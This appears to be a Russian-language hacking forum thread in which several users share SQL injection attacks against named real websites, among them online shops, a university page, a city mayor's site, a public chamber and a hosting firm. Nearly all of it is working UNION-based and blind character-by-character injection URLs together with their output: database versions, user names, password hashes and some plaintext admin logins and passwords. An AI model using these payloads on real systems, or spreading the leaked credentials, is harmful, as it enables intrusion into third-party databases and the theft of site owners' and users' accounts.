http://www.cashmerewholesalecentre.com/product.php?cid=-100'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* Database Version: 4.1.22-community-nt Database name: akee User name: akee@localhost Found table login with columns id,password,username Have fun...
Code: http://www.rtos.com/page/product.php?id=-6+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4-- version(): 4.1.20-log user(): [email protected] database(): expresslogic ТИЦ = 30 Code: http://nlsod.ru/?d=o_company&f=company&id=-6+union+select+1,concat(version(),0x3a,user(),0x3a,database()),user+from+mysql.user+limit+0,1-- version(): 5.0.33 user(): root@localhost database(): 1gb_nlsoddb ТИЦ = 30 Code: http://www.svadbaexpo.ru/index.php?id=-6+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3-- version(): 4.1.20-log user(): [email protected] database(): db_tours_3 ТИЦ = 100
Software shop... http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61/* Database Version: 4.0.20 Database name: piatadesoft User name: root@localhost http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,user,password),43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61+FROM+mysql.user/* root:6ac227d531f5e2da
Электронная библиотека. Code: http://kamonline.ru/index.php?action=viewcat&num=-1+union+select+concat(login,0x3a,passwd)+from+users-- mailbrush, Не понял, это таже самая инъекция, зачем её баянить?
http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-44+union+select+1,2,3,4,version(),6,7,8,9,10,11--
http://www.photokzn.ru так находим таблицу с пользователями: http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+like+char(37,117,115,101,114,37)+limit+2,1),1,1))='117 = u http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+like+char(37,117,115,101,114,37)+limit+2,1),2,1))='115 = s http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+like+char(37,117,115,101,114,37)+limit+2,1),3,1))='101 = e http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+like+char(37,117,115,101,114,37)+limit+2,1),4,1))='114 = r http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+like+char(37,117,115,101,114,37)+limit+2,1),5,1))='115 = s http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FROM+information_schema.tables+WHERE+table_name+like+char(37,117,115,101,114,37)+limit+2,1),6,1))='0 таблица users находим колонку с паролями: http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+3,1),1,1))='112 = p http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+3,1),2,1))='97 = a http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+3,1),3,1))='115 = s http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+3,1),4,1))='115 = s http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+3,1),5,1))='0 колонка pass находим колонку с логинами: http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+2,1),1,1))='108 = l http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+2,1),2,1))='111 = o http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+2,1),3,1))='103 = g http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+2,1),4,1))='105 = i http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+2,1),5,1))='110 = n http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x7573657273+limit+2,1),6,1))='0 колонка login Теперь вывод логина: http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+users+limit+0,1),1,1))='97 a http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+users+limit+0,1),2,1))='100 d http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+users+limit+0,1),3,1))='109 m http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+users+limit+0,1),4,1))='105 i http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+users+limit+0,1),5,1))='110 n http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+users+limit+0,1),6,1))='0 логин админа - admin вывод пароля из users где имя пользователя admin http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),1,1))='116 = t http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),2,1))='104 = h http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),3,1))='105 = i http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),4,1))='115 = s http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),5,1))='116 = t http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),6,1))='105 = i http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),7,1))='109 = m http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),8,1))='101 = e http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+users+where+login=0x61646d696e),9,1))='0 пароль админа thistime P.s. Там на сайте 5 версия MySQL, можно было бы провести иньекцию по другому, но я не ищу легких путей!!!!=))
www.jvc.ro PR5 http://www.jvc.ro/product.php?id=EX-A10E&catid=100030[SQLINJ] Version : PostgreSQL Current_database : jvc-ro Current_user: ppo З.Ы. Уязвимы все сайты JVC в мире, сделаны они по одной и той же технологии только имена доменов разные и язык на котором предоставлена информация. Скуля слепая... не раскручивал, кому интересно могу помочь
apps.detnews.com Pr 6 HTML: http://apps.detnews.com/apps/history/index.php?id=-14+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,0,1,2,3,4+from+mysql.user root:41221e5672a06384 johnd:2dd99728002374de tdn:41221c6172a0658f tdn:134e3e414b6b964f jdaven:2dd99728002374de ien:475dc867159e96ef drupal_user:79bd7cfe7e82fdf1
http://www.aectra.ro/product.php?prod_id=-186+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),6,7,8,9,10,11,12,13/* Database Version: 4.1.11-Debian_4sarge7-log Database name: aectra User name: aectra@localhost
wap.116.ru юзер - [email protected] бд - wap_116 версия MySQL - 5.0.51b-log www.heaven-house.kz юзер - [email protected] бд - u51572 версия MySQL - 5.0.67-log выводятся все таблицы сразу, limit даже не нужен) www.oprf.ru - ОБЩЕСТВЕННАЯ ПАЛАТА РФ=) Не думал что на таких сайтах могут быть уязвимости=) юзер - oprf@localhost бд - oprf версия MySQL - 5.0.45 выводим список всех админов с пассами) логин главного админа - root пароль - abra админка - http://www.oprf.ru/admin/ p.s Не злоупотреблять=) jokester: я так и буду твои посты объединять?
Code: http://www.defineyourgod.com/god.php?id=69+union+select+1,version(),3,4,5,6,7,8,9,10,11-- 5.0.51a-15 Code: http://www.defineyourgod.com/god.php?id=69+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+18,1--
http://www.solaren.ro/product.php?id=2§ionID=57+UNION+SELECT+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71)+LIMIT+1,1-- Database Version: 5.0.67-community Database name: solarenr_1 User name: solarenr_1@localhost
lookingglass.org Code: http://www.lookingglass.org/links/index.php?cat_id=-77+UNION+SELECT+concat_ws(0x3a,version(),database(),user())-- PR7 5.0.67-community looking_publications looking_ttlgadmi@localhost Есть доступ к INFORMATION_SCHEMA можем смотреть названия таблиц и так далее =)
Code: http://www.bellagreetings.com/1/card.php?ID=-1135'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 4.1.20 Code: http://www.evergreenmarketing.com/card.php?ID=-55'+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 4.1.22
http://mer.e-kazan.ru Сайт мэра города Казани=) юзер: http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),1,1)))='109 = m http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),2,1)))='101 = e http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),3,1)))='114 = r http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),4,1)))='64 = @ http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),5,1)))='108 = l http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),6,1)))='111 = o http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),7,1)))='99 = c http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),8,1)))='97 = a http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),9,1)))='108 = l http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),10,1)))='104 = h http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),11,1)))='111 = o http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),12,1)))='115 = s http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),13,1)))='116 = t http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),14,1)))='0 бд: http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),1,1)))='109 = m http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),2,1)))='101 = e http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),3,1)))='114 = r http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),4,1)))='0 версия MySQL - 5: http://mer.e-kazan.ru/rus/events'+and+substring(version(),1,1)='5 p.s. через information_shema можно вывести все таблицы, но к сожалению на сайте base авторизация ='(
какой то шоп: Code: http://www.ptpworld.es/index.php?menu=adorder&adid=-1+union+select+1,2,group_concat(concat_ws(0x3a,username,password,email)),4+from+users-- ------------------------------------------------------------------ Code: http://www.nashvilleindian.com/yellowpages1.php?id=-394+union+select+1,2,3,concat(0x3a,emailid,password),5,6,7,8,9,10,11,12,13,14+from+users-- получаем не малое количество юзеров... ------------------------------------------------------------------ Хостинг Code: http://www.bigfatwebhosting.co.uk/help/index.php?view=-1+union+select+1,concat(0x3a,user,pass),3,4,5,6+from+admin-- логин/пасс: Code: mikeyj69:RPmjbf69XYz4 ------------------------------------------------------------- The End!
weissenborn.es Code: http://www.weissenborn.es/cubecart/index.php?cat_id=-3+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8-- PR4 4.1.22-standard eweissen_ccrt1 eweissen_ccrt1@localhost Вобщем этот шоп построен на CubeCart =) такой же еще один нашел... www.fontwerks.com Только тут названия таблиц и полей читать можно из INFORMATION_SCHEMA...
rugbycanada.ca Code: http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user ()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* PR7 Version:4.0.27 DB:rugbyca user:rugbyca@localhost Так же можем прочитать логин и пароль админа: Code: http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws (0x3a,id,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+administrators/* Только как-то пароль странно вывел или с солью или не понятно вообще что это =) 1:rugbyca:0f9c80a8014a66940ce454df4fcac581:b2
vkazan.ru юзер: http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),1,1)))=112 = p http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),2,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),3,1)))=119 = w http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),4,1)))=101 = e http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),5,1)))=114 = r http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),6,1)))=95 = _ http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),7,1)))=103 = g http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),8,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),9,1)))=114 = r http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),10,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),11,1)))=100 = d http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),12,1)))=97 = a http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),13,1)))=64 = @ http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),14,1)))=108 = l http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),15,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),16,1)))=99 = c http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),17,1)))=97 = a http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),18,1)))=108 = l http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),19,1)))=104 = h http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),20,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),21,1)))=115 = s http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),22,1)))=116 = t http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user(),23,1)))=0 [B]бд:[/B] http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),1,1)))=112 = p http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),2,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),3,1)))=119 = w http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),4,1)))=101 = e http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),5,1)))=114 = r http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),6,1)))=95 = _ http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),7,1)))=103 = g http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),8,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),9,1)))=114 = r http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),10,1)))=111 = o http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),11,1)))=100 = d http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),12,1)))=97 = a http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(database(),13,1)))=0 версия MySQL - 5 http://vkazan.ru/city/sights/index.html?id=560+and+(substring(version(),1,1))=5 p.s. нет выводимых полей, опять пришлось через подзапросы все делать=)
